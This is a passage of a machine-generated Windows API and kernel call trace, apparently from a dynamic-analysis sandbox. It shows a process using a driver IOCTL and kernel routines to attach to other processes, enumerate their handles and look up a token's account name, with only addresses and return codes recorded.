IoCompleteRequest () returned 0x0 [0291.679] PsLookupProcessByProcessId (in: ProcessId=0x164, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.679] PsAcquireProcessExitSynchronization () returned 0x0 [0291.680] KeStackAttachProcess (in: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400) [0291.680] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006911b5a0, HandleInformation=0x0) returned 0x0 [0291.680] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.680] PsReleaseProcessExitSynchronization () returned 0x2 [0291.680] ObfDereferenceObject (Object=0xffffe00069053080) returned 0x30021 [0291.680] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe00069ba5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069ba5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.680] ObfDereferenceObject (Object=0xffffe0006911b5a0) returned 0x7ffe [0291.680] IoCompleteRequest () returned 0x0 [0291.680] PsLookupProcessByProcessId (in: ProcessId=0x164, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.680] PsAcquireProcessExitSynchronization () returned 0x0 [0291.680] KeStackAttachProcess (in: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400) [0291.680] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006911dd10, HandleInformation=0x0) returned 0x0 [0291.680] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.680] PsReleaseProcessExitSynchronization () returned 0x2 [0291.680] ObfDereferenceObject (Object=0xffffe00069053080) returned 0x30020 [0291.680] ObQueryNameString (in: Object=0xffffe0006911dd10, ObjectNameInfo=0xffffe0006a7c6044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7c6044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.680] ObfDereferenceObject (Object=0xffffe0006911dd10) returned 0x800e [0291.680] IoCompleteRequest () returned 0x0 [0291.680] PsLookupProcessByProcessId (in: ProcessId=0x164, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.680] PsAcquireProcessExitSynchronization () returned 0x0 [0291.680] KeStackAttachProcess (in: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400) [0291.680] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069122090, HandleInformation=0x0) returned 0x0 [0291.680] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.680] PsReleaseProcessExitSynchronization () returned 0x2 [0291.680] ObfDereferenceObject (Object=0xffffe00069053080) returned 0x3001f [0291.680] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a606044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a606044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.680] ObfDereferenceObject (Object=0xffffe00069122090) returned 0x7ffe [0291.680] IoCompleteRequest () returned 0x0 [0291.680] PsLookupProcessByProcessId (in: ProcessId=0x164, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.680] PsAcquireProcessExitSynchronization () returned 0x0 [0291.680] KeStackAttachProcess (in: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400) [0291.680] ObReferenceObjectByHandle (in: Handle=0x4dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006930a900, HandleInformation=0x0) returned 0x0 [0291.680] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.680] PsReleaseProcessExitSynchronization () returned 0x2 [0291.680] ObfDereferenceObject (Object=0xffffe00069053080) returned 0x3001e [0291.680] ObQueryNameString (in: Object=0xffffe0006930a900, ObjectNameInfo=0xffffe00068a61044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068a61044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.680] ObfDereferenceObject (Object=0xffffe0006930a900) returned 0x7fff [0291.680] IoCompleteRequest () returned 0x0 [0291.680] PsLookupProcessByProcessId (in: ProcessId=0x164, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.680] PsAcquireProcessExitSynchronization () returned 0x0 [0291.680] KeStackAttachProcess (in: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400) [0291.680] ObReferenceObjectByHandle (in: Handle=0x7ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a417b20, HandleInformation=0x0) returned 0x0 [0291.680] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.680] PsReleaseProcessExitSynchronization () returned 0x2 [0291.680] ObfDereferenceObject (Object=0xffffe00069053080) returned 0x3001d [0291.681] ObQueryNameString (in: Object=0xffffe0006a417b20, ObjectNameInfo=0xffffe000691997c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691997c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.681] ObfDereferenceObject (Object=0xffffe0006a417b20) returned 0x7fff [0291.681] IoCompleteRequest () returned 0x0 [0291.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbd0) returned 0x188 [0291.681] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.681] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006984f080, HandleInformation=0x0) returned 0x0 [0291.681] ObOpenObjectByPointer (in: Object=0xffffe0006984f080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.681] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x37f7f [0291.681] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a29a180 | out: TokenHandle=0xffffe0006a29a180*=0x18c) returned 0x0 [0291.681] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.681] IoCompleteRequest () returned 0x0 [0291.681] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.681] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.682] CloseHandle (hObject=0x18c) returned 1 [0291.682] CloseHandle (hObject=0x188) returned 1 [0291.682] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.682] PsAcquireProcessExitSynchronization () returned 0x0 [0291.682] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.682] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006902ada0, HandleInformation=0x0) returned 0x0 [0291.682] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.682] PsReleaseProcessExitSynchronization () returned 0x2 [0291.682] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff7d [0291.682] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006850a044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006850a044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.682] ObfDereferenceObject (Object=0xffffe0006902ada0) returned 0x7ffe [0291.682] IoCompleteRequest () returned 0x0 [0291.682] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.682] PsAcquireProcessExitSynchronization () returned 0x0 [0291.682] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.683] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069546cd0, HandleInformation=0x0) returned 0x0 [0291.683] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.683] PsReleaseProcessExitSynchronization () returned 0x2 [0291.683] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff7c [0291.683] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068524044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068524044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.683] ObfDereferenceObject (Object=0xffffe00069546cd0) returned 0x7ffe [0291.683] IoCompleteRequest () returned 0x0 [0291.683] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.683] PsAcquireProcessExitSynchronization () returned 0x0 [0291.684] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.684] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a49b3a0, HandleInformation=0x0) returned 0x0 [0291.684] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.684] PsReleaseProcessExitSynchronization () returned 0x2 [0291.684] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff7b [0291.684] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.684] ObfDereferenceObject (Object=0xffffe0006a49b3a0) returned 0x7fc0 [0291.684] IoCompleteRequest () returned 0x0 [0291.684] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.684] PsAcquireProcessExitSynchronization () returned 0x0 [0291.684] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.684] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a552320, HandleInformation=0x0) returned 0x0 [0291.684] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.684] PsReleaseProcessExitSynchronization () returned 0x2 [0291.684] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff7a [0291.684] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.684] ObfDereferenceObject (Object=0xffffe0006a552320) returned 0x7ffd [0291.684] IoCompleteRequest () returned 0x0 [0291.684] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.684] PsAcquireProcessExitSynchronization () returned 0x0 [0291.684] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.684] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4d9e50, HandleInformation=0x0) returned 0x0 [0291.684] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.684] PsReleaseProcessExitSynchronization () returned 0x2 [0291.684] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff79 [0291.684] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.684] ObfDereferenceObject (Object=0xffffe0006a4d9e50) returned 0x7ffe [0291.684] IoCompleteRequest () returned 0x0 [0291.684] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.684] PsAcquireProcessExitSynchronization () returned 0x0 [0291.684] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.684] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4932f0, HandleInformation=0x0) returned 0x0 [0291.684] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.684] PsReleaseProcessExitSynchronization () returned 0x2 [0291.684] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff78 [0291.684] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.684] ObfDereferenceObject (Object=0xffffe0006a4932f0) returned 0xffd8 [0291.684] IoCompleteRequest () returned 0x0 [0291.684] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.684] PsAcquireProcessExitSynchronization () returned 0x0 [0291.684] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.684] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4932f0, HandleInformation=0x0) returned 0x0 [0291.684] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.684] PsReleaseProcessExitSynchronization () returned 0x2 [0291.684] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff77 [0291.684] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6a1044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a1044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.685] ObfDereferenceObject (Object=0xffffe0006a4932f0) returned 0xffd7 [0291.685] IoCompleteRequest () returned 0x0 [0291.685] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.685] PsAcquireProcessExitSynchronization () returned 0x0 [0291.685] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.685] ObReferenceObjectByHandle (in: Handle=0xbc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0d2f20, HandleInformation=0x0) returned 0x0 [0291.685] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.685] PsReleaseProcessExitSynchronization () returned 0x2 [0291.685] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff76 [0291.685] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.685] ObfDereferenceObject (Object=0xffffe0006a0d2f20) returned 0x7ffd [0291.685] IoCompleteRequest () returned 0x0 [0291.685] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.685] PsAcquireProcessExitSynchronization () returned 0x0 [0291.685] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.685] ObReferenceObjectByHandle (in: Handle=0x1b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069dcb090, HandleInformation=0x0) returned 0x0 [0291.685] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.685] PsReleaseProcessExitSynchronization () returned 0x2 [0291.685] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff75 [0291.685] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.685] ObfDereferenceObject (Object=0xffffe00069dcb090) returned 0x7ffe [0291.685] IoCompleteRequest () returned 0x0 [0291.685] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.685] PsAcquireProcessExitSynchronization () returned 0x0 [0291.685] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.685] ObReferenceObjectByHandle (in: Handle=0x23c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007b9f8d00, HandleInformation=0x0) returned 0x0 [0291.685] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.685] PsReleaseProcessExitSynchronization () returned 0x2 [0291.685] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff74 [0291.685] ObQueryNameString (in: Object=0xffffe0007b9f8d00, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.685] ObfDereferenceObject (Object=0xffffe0007b9f8d00) returned 0x7ffc [0291.685] IoCompleteRequest () returned 0x0 [0291.685] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.685] PsAcquireProcessExitSynchronization () returned 0x0 [0291.685] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.685] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006941b220, HandleInformation=0x0) returned 0x0 [0291.685] ObfDereferenceObject (Object=0xffffe0006941b220) returned 0x800d [0291.685] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.685] PsReleaseProcessExitSynchronization () returned 0x2 [0291.685] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff73 [0291.685] IoCompleteRequest () returned 0x0 [0291.685] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.685] PsAcquireProcessExitSynchronization () returned 0x0 [0291.685] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.685] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006941b540, HandleInformation=0x0) returned 0x0 [0291.686] ObfDereferenceObject (Object=0xffffe0006941b540) returned 0x7fff [0291.686] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.686] PsReleaseProcessExitSynchronization () returned 0x2 [0291.686] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff72 [0291.686] IoCompleteRequest () returned 0x0 [0291.686] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.686] PsAcquireProcessExitSynchronization () returned 0x0 [0291.686] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.686] ObReferenceObjectByHandle (in: Handle=0x28c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a69b7a0, HandleInformation=0x0) returned 0x0 [0291.686] ObfDereferenceObject (Object=0xffffe0006a69b7a0) returned 0x7fff [0291.686] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.686] PsReleaseProcessExitSynchronization () returned 0x2 [0291.686] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff71 [0291.686] IoCompleteRequest () returned 0x0 [0291.686] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.686] PsAcquireProcessExitSynchronization () returned 0x0 [0291.686] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.686] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6fcf20, HandleInformation=0x0) returned 0x0 [0291.686] ObfDereferenceObject (Object=0xffffe0006a6fcf20) returned 0x800b [0291.686] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.686] PsReleaseProcessExitSynchronization () returned 0x2 [0291.686] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff70 [0291.686] IoCompleteRequest () returned 0x0 [0291.686] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.686] PsAcquireProcessExitSynchronization () returned 0x0 [0291.686] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.686] ObReferenceObjectByHandle (in: Handle=0x2b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069440840, HandleInformation=0x0) returned 0x0 [0291.686] ObfDereferenceObject (Object=0xffffe00069440840) returned 0x17ffc [0291.686] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.686] PsReleaseProcessExitSynchronization () returned 0x2 [0291.686] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff6f [0291.686] IoCompleteRequest () returned 0x0 [0291.686] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.686] PsAcquireProcessExitSynchronization () returned 0x0 [0291.686] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.686] ObReferenceObjectByHandle (in: Handle=0x2bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a768a00, HandleInformation=0x0) returned 0x0 [0291.686] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.686] PsReleaseProcessExitSynchronization () returned 0x2 [0291.686] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff6e [0291.686] ObQueryNameString (in: Object=0xffffe0006a768a00, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.686] ObfDereferenceObject (Object=0xffffe0006a768a00) returned 0x7ffe [0291.686] IoCompleteRequest () returned 0x0 [0291.686] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.686] PsAcquireProcessExitSynchronization () returned 0x0 [0291.687] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.687] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069121080, HandleInformation=0x0) returned 0x0 [0291.687] ObfDereferenceObject (Object=0xffffe00069121080) returned 0x27fee [0291.687] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.687] PsReleaseProcessExitSynchronization () returned 0x2 [0291.687] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x2ff6d [0291.687] IoCompleteRequest () returned 0x0 [0291.687] PsLookupProcessByProcessId (in: ProcessId=0xbd0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.687] PsAcquireProcessExitSynchronization () returned 0x0 [0291.687] KeStackAttachProcess (in: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006984f080, ApcState=0xffffd000ac0cf400) [0291.687] ObReferenceObjectByHandle (in: Handle=0x2cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4c9690, HandleInformation=0x0) returned 0x0 [0291.687] ObfDereferenceObject (Object=0xffffe0006a4c9690) returned 0x7fff [0291.687] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.687] 